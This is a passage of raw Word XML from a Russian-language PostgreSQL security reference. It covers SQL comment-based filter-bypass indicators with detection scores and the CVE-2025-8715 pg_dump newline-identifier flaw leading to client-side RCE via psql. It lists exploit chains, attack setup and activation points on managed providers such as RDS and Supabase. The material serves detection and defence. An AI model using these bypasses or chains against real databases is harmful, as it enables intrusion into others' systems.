        <w:t>. Nested comments в runtime-SQL почти всегда обход фильтра; legitimate use cases редки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EA928" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comment_cr_only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Одиночный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти никогда не legitimate; индикатор byte-level encoding bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C1B6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comment_unbalanced_block</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>. False-positive-rate выше (могут возникать в legitimate auto-generated SQL); маркер только в комбинации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073511C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.12.3 (R25) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не покрывается серверным rules.py</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F77F12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>1. Sanitizer работает на runtime-SQL приложения, не на pg_dump output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D29A79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>2. Setup-команды (CREATE ROLE/TABLE с newline) проходят через rules.py как обычный DDL (правильно — это валидный SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187CF1FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Активация (psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>) происходит на стороне DBA, не приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5C758B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обнаружение R25 — отдельная процедура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inventory-уровня</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не SQL-pattern-уровня. См. queries в Саммари (выше) для разовой проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_description</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521607EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323ACBF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-8715: PostgreSQL advisory, GBHackers коverage, контекст регрессии CVE-2012-0868. Применимо только к 3.12.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEA2E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL Docs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Lexical Structure §4.1.1 (Identifiers), §4.1.5 (Comments) — спецификация для всех трёх подразделов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC8DA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/parser/scan.l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (states </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для block-comments, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xqs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для line-comments) — реализация nested и CR/LF handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C209D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL standard SQL:2008 §5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст line-terminator-семантики.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF76D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PortSwigger SQLi cheat sheet (filter bypass через comment-tricks), HackTricks PostgreSQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717EB666" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25284BE9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.12.2 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо для обхода input-фильтра + multi-statement. В extended-protocol заблокировано на сервере; в simple-protocol проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F4F001" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 (COPY FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — server-side counterpart к 3.12.3 RCE-каналу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A81F57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (Filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.6 (whitespace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и 3.12.1 (nested </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t>) — close родственники; граница закреплена в conventions.md.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC749A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.7 (CVE-2025-1094)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой client-side bug; chain-ятся через psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.12.3 + 3.9.7 — двойной client-side compromise pathway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461B862" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.12.3 setup может требовать privileged operations (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>); путь к ним — через 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB2EF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — server-side counterpart 3.12.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607494E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (Хронология 2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полный разбор CVE-2025-8715: timeline, exact mechanism, full chain, managed-провайдеры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380B149" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.7 (Цепочки)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-8715 + COPY TO PROGRAM (R3) или + CVE-2025-1094 (R6) — двух-/трёх-ступенчатые exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E4225" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 (Конфиги PostgreSQL)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекомендации по audit-логированию событий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с byte-level inspection имени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC4C66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186BBF6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.1 и 3.12.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-layer фильтрацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (sanitizer, WAF). Managed-PG не предоставляет input-WAF (см. summary-3.9 раздел про managed); приёмы работают идентично self-hosted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B47F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.3 (R25)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — более интересная картина по провайдерам:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782464E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS RDS / Aurora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: pg_dump-операции через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aws rds export-cluster-to-s3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> использует pg_dump --format=plain → psql restore. Если backup-restore-pipeline через managed-mechanism — patch-state RDS зависит от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maintenance window</w:t>
      </w:r>
      <w:r>
        <w:t>. До патча 17.6/16.10/15.14/14.19/13.22 — уязвимы. Custom RDS-snapshots через native pg_dump — патчат локальный psql + RDS-target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27400F7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: аналогично через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gcloud sql export sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gcloud sql import sql</w:t>
      </w:r>
      <w:r>
        <w:t>. Auto-update в maintenance windows; до окна — уязвимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F2E50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase</w:t>
      </w:r>
      <w:r>
        <w:t>: использует pg_dump для backup-export. Auto-update — patch обычно в течение недели после release. Поверхность атаки активна короткое окно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C08F39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Render / Heroku / Neon</w:t>
      </w:r>
      <w:r>
        <w:t>: pg_dump-restore pipeline у каждого провайдера свой; необходимо проверять конкретный flow и version psql/libpq на host, который запускает restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E436796" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup для R25 (создание объекта с newline-в-имени)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на managed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE98BEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   RDS / Cloud SQL: application-роль обычно имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на собственной user-schema, что достаточно для CREATE TABLE с opasnym именем. CREATE ROLE — обычно не доступен application (требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA0A44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Supabase: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>anon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> роли имеют ограниченный CREATE; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>service_role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет полный доступ — если её ключ компрометирован, setup тривиален.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258C69F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Activation для R25</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8753D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Backup-restore — обычно DBA-операция на admin-machine; уязвима, если psql-version-on-host старый.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4676D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CI-pipelines для test-database-seeding часто используют pg_dump-restore — точка активации, если payload в production proliferates до test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49A2C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Полная таблица провайдеров и patch-окон для R25 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF62DCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для самостоятельной проверки текущего кластера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B479080" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Все версии установленных компонентов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F4A7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
